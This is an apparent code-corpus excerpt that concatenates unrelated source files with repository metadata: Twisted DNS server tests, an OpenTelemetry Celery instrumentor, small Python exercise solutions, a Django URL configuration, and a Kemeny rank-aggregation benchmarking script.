error.AuthoritativeDomainError(), dns.ENAME)
def test_gotResolverErrorOtherError(self):
"""
L{server.DNSServerFactory.gotResolver} triggers a response message with
an C{rCode} of L{dns.ESERVER} if supplied with another type of error and
logs the error.
"""
self._assertMessageRcodeForError(KeyError(), dns.ESERVER)
e = self.flushLoggedErrors(KeyError)
self.assertEqual(len(e), 1)
def test_gotResolverErrorLogging(self):
"""
L{server.DNSServerFactory.gotResolver} logs a message if C{verbose > 0}.
"""
f = NoResponseDNSServerFactory(verbose=1)
assertLogMessage(
self,
["Lookup failed"],
f.gotResolverError,
failure.Failure(error.DomainError()),
protocol=NoopProtocol(), message=dns.Message(), address=None)
def test_gotResolverErrorResetsResponseAttributes(self):
"""
L{server.DNSServerFactory.gotResolverError} does not allow request
attributes to leak into the response ie it sends a response with AD, CD
set to 0 and empty response record sections.
"""
factory = server.DNSServerFactory()
responses = []
factory.sendReply = (
lambda protocol, response, address: responses.append(response)
)
request = dns.Message(authenticData=True, checkingDisabled=True)
request.answers = [object(), object()]
request.authority = [object(), object()]
request.additional = [object(), object()]
factory.gotResolverError(
failure.Failure(error.DomainError()),
protocol=None, message=request, address=None
)
self.assertEqual([dns.Message(rCode=3, answer=True)], responses)
def test_gotResolverResponseResetsResponseAttributes(self):
"""
L{server.DNSServerFactory.gotResolverResponse} does not allow request
attributes to leak into the response ie it sends a response with AD, CD
set to 0 and none of the records in the request answer sections are
copied to the response.
"""
factory = server.DNSServerFactory()
responses = []
factory.sendReply = (
lambda protocol, response, address: responses.append(response)
)
request = dns.Message(authenticData=True, checkingDisabled=True)
request.answers = [object(), object()]
request.authority = [object(), object()]
request.additional = [object(), object()]
factory.gotResolverResponse(
([], [], []),
protocol=None, message=request, address=None
)
self.assertEqual([dns.Message(rCode=0, answer=True)], responses)
def test_sendReplyWithAddress(self):
"""
If L{server.DNSServerFactory.sendReply} is supplied with a protocol
*and* an address tuple it will supply that address to
C{protocol.writeMessage}.
"""
m = dns.Message()
dummyAddress = object()
f = server.DNSServerFactory()
e = self.assertRaises(
RaisingProtocol.WriteMessageArguments,
f.sendReply,
protocol=RaisingProtocol(),
message=m,
address=dummyAddress)
args, kwargs = e.args
self.assertEqual(args, (m, dummyAddress))
self.assertEqual(kwargs, {})
def test_sendReplyWithoutAddress(self):
"""
If L{server.DNSServerFactory.sendReply} is supplied with a protocol but
no address tuple it will supply only a message to
C{protocol.writeMessage}.
"""
m = dns.Message()
f = server.DNSServerFactory()
e = self.assertRaises(
RaisingProtocol.WriteMessageArguments,
f.sendReply,
protocol=RaisingProtocol(),
message=m,
address=None)
args, kwargs = e.args
self.assertEqual(args, (m,))
self.assertEqual(kwargs, {})
def test_sendReplyLoggingNoAnswers(self):
"""
If L{server.DNSServerFactory.sendReply} logs a "no answers" message if
the supplied message has no answers.
"""
self.patch(server.time, 'time', lambda: 86402)
m = dns.Message()
m.timeReceived = 86401
f = server.DNSServerFactory(verbose=2)
assertLogMessage(
self,
["Replying with no answers", "Processed query in 1.000 seconds"],
f.sendReply,
protocol=NoopProtocol(),
message=m,
address=None)
def test_sendReplyLoggingWithAnswers(self):
"""
If L{server.DNSServerFactory.sendReply} logs a message for answers,
authority, additional if the supplied a message has records in any of
those sections.
"""
self.patch(server.time, 'time', lambda: 86402)
m = dns.Message()
m.answers.append(dns.RRHeader(payload=dns.Record_A('127.0.0.1')))
m.authority.append(dns.RRHeader(payload=dns.Record_A('127.0.0.1')))
m.additional.append(dns.RRHeader(payload=dns.Record_A('127.0.0.1')))
m.timeReceived = 86401
f = server.DNSServerFactory(verbose=2)
assertLogMessage(
self,
['Answers are <A address=127.0.0.1 ttl=None>',
'Authority is <A address=127.0.0.1 ttl=None>',
'Additional is <A address=127.0.0.1 ttl=None>',
'Processed query in 1.000 seconds'],
f.sendReply,
protocol=NoopProtocol(),
message=m,
address=None)
def test_handleInverseQuery(self):
"""
L{server.DNSServerFactory.handleInverseQuery} triggers the sending of a
response message with C{rCode} set to L{dns.ENOTIMP}.
"""
f = server.DNSServerFactory()
e = self.assertRaises(
RaisingProtocol.WriteMessageArguments,
f.handleInverseQuery,
message=dns.Message(), protocol=RaisingProtocol(), address=None)
(message,), kwargs = e.args
self.assertEqual(message.rCode, dns.ENOTIMP)
def test_handleInverseQueryLogging(self):
"""
L{server.DNSServerFactory.handleInverseQuery} logs the message origin
address if C{verbose > 0}.
"""
f = NoResponseDNSServerFactory(verbose=1)
assertLogMessage(
self,
["Inverse query from ('::1', 53)"],
f.handleInverseQuery,
message=dns.Message(),
protocol=NoopProtocol(),
address=('::1', 53))
def test_handleStatus(self):
"""
L{server.DNSServerFactory.handleStatus} triggers the sending of a
response message with C{rCode} set to L{dns.ENOTIMP}.
"""
f = server.DNSServerFactory()
e = self.assertRaises(
RaisingProtocol.WriteMessageArguments,
f.handleStatus,
message=dns.Message(), protocol=RaisingProtocol(), address=None)
(message,), kwargs = e.args
self.assertEqual(message.rCode, dns.ENOTIMP)
def test_handleStatusLogging(self):
"""
L{server.DNSServerFactory.handleStatus} logs the message origin address
if C{verbose > 0}.
"""
f = NoResponseDNSServerFactory(verbose=1)
assertLogMessage(
self,
["Status request from ('::1', 53)"],
f.handleStatus,
message=dns.Message(),
protocol=NoopProtocol(),
address=('::1', 53))
def test_handleNotify(self):
"""
L{server.DNSServerFactory.handleNotify} triggers the sending of a
response message with C{rCode} set to L{dns.ENOTIMP}.
"""
f = server.DNSServerFactory()
e = self.assertRaises(
RaisingProtocol.WriteMessageArguments,
f.handleNotify,
message=dns.Message(), protocol=RaisingProtocol(), address=None)
(message,), kwargs = e.args
self.assertEqual(message.rCode, dns.ENOTIMP)
def test_handleNotifyLogging(self):
"""
L{server.DNSServerFactory.handleNotify} logs the message origin address
if C{verbose > 0}.
"""
f = NoResponseDNSServerFactory(verbose=1)
assertLogMessage(
self,
["Notify message from ('::1', 53)"],
f.handleNotify,
message=dns.Message(),
protocol=NoopProtocol(),
address=('::1', 53))
def test_handleOther(self):
"""
L{server.DNSServerFactory.handleOther} triggers the sending of a
response message with C{rCode} set to L{dns.ENOTIMP}.
"""
f = server.DNSServerFactory()
e = self.assertRaises(
RaisingProtocol.WriteMessageArguments,
f.handleOther,
message=dns.Message(), protocol=RaisingProtocol(), address=None)
(message,), kwargs = e.args
self.assertEqual(message.rCode, dns.ENOTIMP)
def test_handleOtherLogging(self):
"""
L{server.DNSServerFactory.handleOther} logs the message origin address
if C{verbose > 0}.
"""
f = NoResponseDNSServerFactory(verbose=1)
assertLogMessage(
self,
["Unknown op code (0) from ('::1', 53)"],
f.handleOther,
message=dns.Message(),
protocol=NoopProtocol(),
address=('::1', 53))
| [
"[email protected]"
] | |
d604b39ae0f8e7002cb175fae59528062f11a466 | 5da988c176252fca1b558190eff74ef3b89afc9f | /instrumentation/opentelemetry-instrumentation-celery/src/opentelemetry/instrumentation/celery/__init__.py | d225e6bd069b0db9f870fc1da037a9f0be6aaf31 | [
"Apache-2.0"
] | permissive | kinvolk/opentelemetry-python | 3801376ee6bdb46d85d8876a97713e698e1241ce | 47483865854c7adae7455f8441dab7f814f4ce2a | refs/heads/master | 2023-05-25T19:36:05.130267 | 2020-11-02T17:29:59 | 2020-11-02T17:29:59 | 201,488,070 | 1 | 2 | Apache-2.0 | 2023-05-16T18:48:46 | 2019-08-09T14:56:28 | Python | UTF-8 | Python | false | false | 8,741 | py | # Copyright The OpenTelemetry Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Instrument `celery`_ to trace Celery applications.
.. _celery: https://pypi.org/project/celery/
Usage
-----
* Start broker backend
.. code::
docker run -p 5672:5672 rabbitmq
* Run instrumented task
.. code:: python
from opentelemetry import trace
from opentelemetry.sdk.trace import TracerProvider
from opentelemetry.sdk.trace.export import BatchExportSpanProcessor
from opentelemetry.instrumentation.celery import CeleryInstrumentor
from celery import Celery
from celery.signals import worker_process_init
@worker_process_init.connect(weak=False)
def init_celery_tracing(*args, **kwargs):
trace.set_tracer_provider(TracerProvider())
span_processor = BatchExportSpanProcessor(ConsoleSpanExporter())
trace.get_tracer_provider().add_span_processor(span_processor)
CeleryInstrumentor().instrument()
app = Celery("tasks", broker="amqp://localhost")
@app.task
def add(x, y):
return x + y
add.delay(42, 50)
API
---
"""
import logging
import signal
from collections.abc import Iterable
from celery import signals # pylint: disable=no-name-in-module
from opentelemetry import propagators, trace
from opentelemetry.instrumentation.celery import utils
from opentelemetry.instrumentation.celery.version import __version__
from opentelemetry.instrumentation.instrumentor import BaseInstrumentor
from opentelemetry.trace.propagation.textmap import DictGetter
from opentelemetry.trace.status import Status, StatusCode
logger = logging.getLogger(__name__)
# Task operations
_TASK_TAG_KEY = "celery.action"
_TASK_APPLY_ASYNC = "apply_async"
_TASK_RUN = "run"
_TASK_RETRY_REASON_KEY = "celery.retry.reason"
_TASK_REVOKED_REASON_KEY = "celery.revoked.reason"
_TASK_REVOKED_TERMINATED_SIGNAL_KEY = "celery.terminated.signal"
_TASK_NAME_KEY = "celery.task_name"
_MESSAGE_ID_ATTRIBUTE_NAME = "messaging.message_id"
class CarrierGetter(DictGetter):
def get(self, carrier, key):
value = getattr(carrier, key, [])
if isinstance(value, str) or not isinstance(value, Iterable):
value = (value,)
return value
def keys(self, carrier):
return []
carrier_getter = CarrierGetter()
class CeleryInstrumentor(BaseInstrumentor):
def _instrument(self, **kwargs):
tracer_provider = kwargs.get("tracer_provider")
# pylint: disable=attribute-defined-outside-init
self._tracer = trace.get_tracer(__name__, __version__, tracer_provider)
signals.task_prerun.connect(self._trace_prerun, weak=False)
signals.task_postrun.connect(self._trace_postrun, weak=False)
signals.before_task_publish.connect(
self._trace_before_publish, weak=False
)
signals.after_task_publish.connect(
self._trace_after_publish, weak=False
)
signals.task_failure.connect(self._trace_failure, weak=False)
signals.task_retry.connect(self._trace_retry, weak=False)
def _uninstrument(self, **kwargs):
signals.task_prerun.disconnect(self._trace_prerun)
signals.task_postrun.disconnect(self._trace_postrun)
signals.before_task_publish.disconnect(self._trace_before_publish)
signals.after_task_publish.disconnect(self._trace_after_publish)
signals.task_failure.disconnect(self._trace_failure)
signals.task_retry.disconnect(self._trace_retry)
def _trace_prerun(self, *args, **kwargs):
task = utils.retrieve_task(kwargs)
task_id = utils.retrieve_task_id(kwargs)
if task is None or task_id is None:
return
request = task.request
tracectx = propagators.extract(carrier_getter, request) or None
logger.debug("prerun signal start task_id=%s", task_id)
operation_name = "{0}/{1}".format(_TASK_RUN, task.name)
span = self._tracer.start_span(
operation_name, context=tracectx, kind=trace.SpanKind.CONSUMER
)
activation = self._tracer.use_span(span, end_on_exit=True)
activation.__enter__()
utils.attach_span(task, task_id, (span, activation))
@staticmethod
def _trace_postrun(*args, **kwargs):
task = utils.retrieve_task(kwargs)
task_id = utils.retrieve_task_id(kwargs)
if task is None or task_id is None:
return
logger.debug("postrun signal task_id=%s", task_id)
# retrieve and finish the Span
span, activation = utils.retrieve_span(task, task_id)
if span is None:
logger.warning("no existing span found for task_id=%s", task_id)
return
# request context tags
if span.is_recording():
span.set_attribute(_TASK_TAG_KEY, _TASK_RUN)
utils.set_attributes_from_context(span, kwargs)
utils.set_attributes_from_context(span, task.request)
span.set_attribute(_TASK_NAME_KEY, task.name)
activation.__exit__(None, None, None)
utils.detach_span(task, task_id)
def _trace_before_publish(self, *args, **kwargs):
task = utils.retrieve_task_from_sender(kwargs)
task_id = utils.retrieve_task_id_from_message(kwargs)
if task is None or task_id is None:
return
operation_name = "{0}/{1}".format(_TASK_APPLY_ASYNC, task.name)
span = self._tracer.start_span(
operation_name, kind=trace.SpanKind.PRODUCER
)
# apply some attributes here because most of the data is not available
if span.is_recording():
span.set_attribute(_TASK_TAG_KEY, _TASK_APPLY_ASYNC)
span.set_attribute(_MESSAGE_ID_ATTRIBUTE_NAME, task_id)
span.set_attribute(_TASK_NAME_KEY, task.name)
utils.set_attributes_from_context(span, kwargs)
activation = self._tracer.use_span(span, end_on_exit=True)
activation.__enter__()
utils.attach_span(task, task_id, (span, activation), is_publish=True)
headers = kwargs.get("headers")
if headers:
propagators.inject(type(headers).__setitem__, headers)
@staticmethod
def _trace_after_publish(*args, **kwargs):
task = utils.retrieve_task_from_sender(kwargs)
task_id = utils.retrieve_task_id_from_message(kwargs)
if task is None or task_id is None:
return
# retrieve and finish the Span
_, activation = utils.retrieve_span(task, task_id, is_publish=True)
if activation is None:
logger.warning("no existing span found for task_id=%s", task_id)
return
activation.__exit__(None, None, None)
utils.detach_span(task, task_id, is_publish=True)
@staticmethod
def _trace_failure(*args, **kwargs):
task = utils.retrieve_task_from_sender(kwargs)
task_id = utils.retrieve_task_id(kwargs)
if task is None or task_id is None:
return
# retrieve and pass exception info to activation
span, _ = utils.retrieve_span(task, task_id)
if span is None or not span.is_recording():
return
status_kwargs = {"status_code": StatusCode.ERROR}
ex = kwargs.get("einfo")
if (
hasattr(task, "throws")
and ex is not None
and isinstance(ex.exception, task.throws)
):
return
if ex is not None:
status_kwargs["description"] = str(ex)
span.set_status(Status(**status_kwargs))
@staticmethod
def _trace_retry(*args, **kwargs):
task = utils.retrieve_task_from_sender(kwargs)
task_id = utils.retrieve_task_id_from_request(kwargs)
reason = utils.retrieve_reason(kwargs)
if task is None or task_id is None or reason is None:
return
span, _ = utils.retrieve_span(task, task_id)
if span is None or not span.is_recording():
return
# Add retry reason metadata to span
# Use `str(reason)` instead of `reason.message` in case we get
# something that isn't an `Exception`
span.set_attribute(_TASK_RETRY_REASON_KEY, str(reason))
| [
"[email protected]"
] | |
26fc8b49fcc85ffb16820963727e86ecec723ae3 | abccdbf9b0849b47960c3c352870793405debfed | /0x02-python-import_modules/3-infinite_add.py | 319d74896baaa8ff2b1e4ae09a0a2729223fdf4b | [] | no_license | hunterxx0/holbertonschool-higher_level_programming | 88b1b0f31b536c6940f2e64a6924a06ba9cbf193 | 44064cf0722cd20d93f58b64ab185d2898770d73 | refs/heads/master | 2022-12-20T12:14:15.877147 | 2020-09-24T21:25:54 | 2020-09-24T21:25:54 | 259,276,369 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 290 | py | #!/usr/bin/python3
if __name__ == "__main__":
from sys import argv
x = len(argv)
if x == 2:
print("{}".format(argv[1]))
elif x == 1:
print("0")
else:
s = 0
for i in range(1, x):
s += int(argv[i])
print("{}".format(s))
| [
"[email protected]"
] | |
ead86ff3ce709ffe0865987335eb19c8dcab3987 | 8a3c1c66828008941dffad983ad79936830045d7 | /abc172/b.py | 084cbc4ece4e6e4b1bae05f8ff60e9956d5934a1 | [
"MIT"
] | permissive | nishio/atcoder | 71130c7923f557b5269ffd8063dab1f7e2732a30 | 8db36537b5d8580745d5f98312162506ad7d7ab4 | refs/heads/master | 2023-04-15T07:41:00.322297 | 2021-04-25T09:00:26 | 2021-04-25T09:00:26 | 273,831,891 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 72 | py | S = input()
T = input()
print(sum(S[i] != T[i] for i in range(len(S))))
| [
"[email protected]"
] | |
3cad8bd54419850ca2db1e342c3d3452f6f847f5 | 3b4b188514c33a1f4568baa59a2a385a2d7b6205 | /config/urls.py | b7d78a9010e1d399cb8c68101fcb8d15635d4acf | [] | no_license | amyth/django-starter | 5d74a7a5654611f966748523982d9d4591f1e43d | 8a629cd717c038677488fd1860cc6001baf8c542 | refs/heads/master | 2020-05-17T17:32:46.993614 | 2014-09-24T07:15:17 | 2014-09-24T07:15:17 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 633 | py | """ Main project url confuguration module. Other url modules
to be included in this module.
"""
from django.conf.urls import patterns, include, url
from django.contrib import admin
admin.autodiscover()
urlpatterns = patterns('',
# Custom apps' urls
url(r'^', include('candidates.urls')),
url(r'^', include('recruiters.urls')),
# Third party apps' urls
url(r'^', include('social_auth.urls')),
url(r'^api', include('rest_framework.urls', namespace='rest_framework')),
# Admin urls
url(r'^admin/doc/', include('django.contrib.admindocs.urls')),
url(r'^admin/', include(admin.site.urls)),
)
| [
"[email protected]"
] | |
087bc3914f01d56c5b118f5446be99dce12b524f | bd72c02af0bbd8e3fc0d0b131e3fb9a2aaa93e75 | /Backtracking/restore_ip_addresses.py | 9f2f7ded2404852ca3a967a2eb84096a1fa29da3 | [] | no_license | harvi7/Leetcode-Problems-Python | d3a5e8898aceb11abc4cae12e1da50061c1d352c | 73adc00f6853e821592c68f5dddf0a823cce5d87 | refs/heads/master | 2023-05-11T09:03:03.181590 | 2023-04-29T22:03:41 | 2023-04-29T22:03:41 | 222,657,838 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 555 | py | class Solution:
def restoreIpAddresses(self, s: str) -> List[str]:
def dfs(idx, path):
if len(path) == 4 or idx == len(s):
if len(path) == 4 and idx == len(s):
output.append(".".join(path))
return
for i in range(idx, min(idx + 3, len(s))):
ip = s[idx : i + 1]
if i == idx or (i > idx and s[idx] != "0" and int(ip) < 256):
dfs(i + 1, path + [ip])
output = []
dfs(0, [])
return output | [
"[email protected]"
] | |
ef4a126562505db34aa836430078148dcbfd71a4 | a462a24ff937e151e8151f3a1bdc9c3714b12c0e | /2021EJOR/scripts/mebb/mebb_11_51.py | 17f1585137674da26b982b1f87cdbfac36fdc275 | [] | no_license | noeliarico/kemeny | b4cbcac57203237769252de2c50ce959aa4ca50e | 50819f8bf0d19fb29a0b5c6d2ee031e8a811497d | refs/heads/main | 2023-03-29T14:36:37.931286 | 2023-03-16T09:04:12 | 2023-03-16T09:04:12 | 330,797,494 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 188,718 | py |
import numpy as np
import pandas as pd
import time
from kemeny import algorithms as alg
rep = 3
results = np.zeros(0).reshape(0,7+rep)
##############################################################
om = np.array([
[0,32,14,21,25,27,30,23,22,16,21],
[19,0,15,18,16,21,21,18,18,17,17],
[37,36,0,32,28,30,31,22,19,25,23],
[30,33,19,0,33,25,27,29,27,19,23],
[26,35,23,18,0,24,24,21,26,24,20],
[24,30,21,26,27,0,27,20,29,26,20],
[21,30,20,24,27,24,0,22,22,24,22],
[28,33,29,22,30,31,29,0,26,28,24],
[29,33,32,24,25,22,29,25,0,22,21],
[35,34,26,32,27,25,27,23,29,0,28],
[30,34,28,28,31,31,29,27,30,23,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 1, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,29,31,29,29,24,22,25,26,28,22],
[22,0,27,25,22,23,23,26,19,23,22],
[20,24,0,25,22,21,22,22,21,27,21],
[22,26,26,0,25,25,26,27,24,27,23],
[22,29,29,26,0,27,26,29,20,31,26],
[27,28,30,26,24,0,22,28,23,33,23],
[29,28,29,25,25,29,0,26,22,30,25],
[26,25,29,24,22,23,25,0,20,27,25],
[25,32,30,27,31,28,29,31,0,32,20],
[23,28,24,24,20,18,21,24,19,0,24],
[29,29,30,28,25,28,26,26,31,27,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 2, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,14,19,23,21,18,15,26,26,30,23],
[37,0,24,24,23,31,29,29,29,32,32],
[32,27,0,29,23,31,24,22,26,26,27],
[28,27,22,0,25,31,22,26,25,33,30],
[30,28,28,26,0,30,22,28,24,37,27],
[33,20,20,20,21,0,19,28,23,31,29],
[36,22,27,29,29,32,0,32,34,33,31],
[25,22,29,25,23,23,19,0,24,29,23],
[25,22,25,26,27,28,17,27,0,27,22],
[21,19,25,18,14,20,18,22,24,0,22],
[28,19,24,21,24,22,20,28,29,29,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 3, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,30,51,30,20,30,20,30,30,20,30],
[21,0,31,51,41,31,21,51,31,21,41],
[0,20,0,30,20,0,0,30,0,0,20],
[21,0,21,0,21,21,21,31,21,21,41],
[31,10,31,30,0,31,31,51,31,31,51],
[21,20,51,30,20,0,41,51,21,41,41],
[31,30,51,30,20,10,0,51,31,21,51],
[21,0,21,20,0,0,0,0,0,0,41],
[21,20,51,30,20,30,20,51,0,20,41],
[31,30,51,30,20,10,30,51,31,0,51],
[21,10,31,10,0,10,0,10,10,0,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 4, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,31,32,29,33,31,21,19,28,24,24],
[20,0,22,22,20,25,25,16,21,24,17],
[19,29,0,20,31,28,27,20,24,25,21],
[22,29,31,0,32,32,25,25,27,25,28],
[18,31,20,19,0,25,24,16,25,20,24],
[20,26,23,19,26,0,26,17,21,27,17],
[30,26,24,26,27,25,0,24,21,16,20],
[32,35,31,26,35,34,27,0,34,22,30],
[23,30,27,24,26,30,30,17,0,23,18],
[27,27,26,26,31,24,35,29,28,0,22],
[27,34,30,23,27,34,31,21,33,29,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 5, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,28,31,25,33,25,28,30,25,29,33],
[23,0,20,19,36,26,29,34,25,36,24],
[20,31,0,22,28,24,31,27,20,23,37],
[26,32,29,0,29,25,24,27,27,31,36],
[18,15,23,22,0,28,26,22,23,21,20],
[26,25,27,26,23,0,28,20,22,22,26],
[23,22,20,27,25,23,0,22,29,21,18],
[21,17,24,24,29,31,29,0,29,29,22],
[26,26,31,24,28,29,22,22,0,24,28],
[22,15,28,20,30,29,30,22,27,0,22],
[18,27,14,15,31,25,33,29,23,29,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 6, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,29,28,29,27,22,24,26,27,28,23],
[22,0,26,29,25,24,18,22,16,23,16],
[23,25,0,26,24,20,21,22,22,25,25],
[22,22,25,0,26,23,19,24,19,21,20],
[24,26,27,25,0,26,22,25,22,22,21],
[29,27,31,28,25,0,23,25,25,25,27],
[27,33,30,32,29,28,0,29,24,27,28],
[25,29,29,27,26,26,22,0,20,24,22],
[24,35,29,32,29,26,27,31,0,27,26],
[23,28,26,30,29,26,24,27,24,0,25],
[28,35,26,31,30,24,23,29,25,26,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 7, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,29,27,34,27,26,28,24,30,31,29],
[22,0,24,22,24,20,22,19,25,22,18],
[24,27,0,28,25,27,29,22,25,30,29],
[17,29,23,0,25,30,27,23,27,24,16],
[24,27,26,26,0,25,34,25,29,25,17],
[25,31,24,21,26,0,22,20,26,28,23],
[23,29,22,24,17,29,0,24,23,32,19],
[27,32,29,28,26,31,27,0,28,28,24],
[21,26,26,24,22,25,28,23,0,26,21],
[20,29,21,27,26,23,19,23,25,0,16],
[22,33,22,35,34,28,32,27,30,35,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 8, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,29,28,28,34,28,25,25,28,27,28],
[22,0,22,14,26,22,21,18,23,26,17],
[23,29,0,23,27,24,27,22,27,26,22],
[23,37,28,0,37,34,25,26,32,29,25],
[17,25,24,14,0,21,19,14,21,22,20],
[23,29,27,17,30,0,22,24,26,26,25],
[26,30,24,26,32,29,0,28,30,24,27],
[26,33,29,25,37,27,23,0,29,26,26],
[23,28,24,19,30,25,21,22,0,24,22],
[24,25,25,22,29,25,27,25,27,0,23],
[23,34,29,26,31,26,24,25,29,28,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 9, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,24,24,47,47,47,47,34,51,34,47],
[27,0,40,36,36,47,51,23,40,27,51],
[27,11,0,23,36,47,47,34,27,23,34],
[4,15,28,0,51,51,28,11,15,27,15],
[4,15,15,0,0,28,15,11,4,27,15],
[4,4,4,0,23,0,15,0,4,27,4],
[4,0,4,23,36,36,0,23,4,27,23],
[17,28,17,40,40,51,28,0,17,27,51],
[0,11,24,36,47,47,47,34,0,23,47],
[17,24,28,24,24,24,24,24,28,0,24],
[4,0,17,36,36,47,28,0,4,27,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 10, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,16,26,26,31,25,20,28,19,23,32],
[35,0,32,23,32,27,26,31,23,28,28],
[25,19,0,28,38,30,24,29,38,25,27],
[25,28,23,0,38,32,21,25,30,24,27],
[20,19,13,13,0,15,20,15,22,18,21],
[26,24,21,19,36,0,21,23,26,20,27],
[31,25,27,30,31,30,0,27,26,25,28],
[23,20,22,26,36,28,24,0,23,25,38],
[32,28,13,21,29,25,25,28,0,30,30],
[28,23,26,27,33,31,26,26,21,0,28],
[19,23,24,24,30,24,23,13,21,23,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 11, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,30,39,44,44,45,33,38,34,23,20],
[21,0,28,30,39,28,23,34,28,22,18],
[12,23,0,22,44,39,27,26,22,17,18],
[7,21,29,0,34,25,24,27,21,17,12],
[7,12,7,17,0,28,7,11,21,12,19],
[6,23,12,26,23,0,17,17,11,16,11],
[18,28,24,27,44,34,0,29,22,16,12],
[13,17,25,24,40,34,22,0,22,18,19],
[17,23,29,30,30,40,29,29,0,22,30],
[28,29,34,34,39,35,35,33,29,0,19],
[31,33,33,39,32,40,39,32,21,32,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 12, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,27,23,36,31,27,20,33,27,29,17],
[24,0,20,34,29,28,25,28,23,29,19],
[28,31,0,38,30,29,17,25,29,30,22],
